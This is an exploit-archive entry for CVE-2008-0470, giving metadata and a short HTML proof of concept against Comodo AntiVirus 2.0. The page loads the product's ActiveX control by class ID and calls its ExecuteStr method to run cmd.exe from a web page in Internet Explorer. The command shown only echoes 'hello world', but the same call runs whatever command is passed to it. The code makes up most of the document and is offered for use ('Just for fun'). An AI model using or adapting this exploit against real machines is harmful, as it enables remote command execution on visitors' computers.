[] NeoSense

Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution

Author: h07
type: remote
platform: windows
port: 
date_added: 2008-01-22 
date_updated: 2016-10-28 
verified: 1 
codes: OSVDB-40921;CVE-2008-0470 
tags: 
aliases:  
screenshot_url:  
application_url: 

<!--
Comodo AntiVirus 2.0 ExecuteStr() 0day Remote Command Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on:..
- Comodo AntiVirus Beta 2.0
- Microsoft Internet Explorer 6
Just for fun  ;)
-->

<html>
<object id="obj" classid="clsid:309F674D-E4D3-46BD-B9E2-ED7DFD7FD176"></object>

<script>
obj.ExecuteStr('cmd.exe', '/C echo "hello world" && pause');
</script>

</html>

# milw0rm.com [2008-01-23]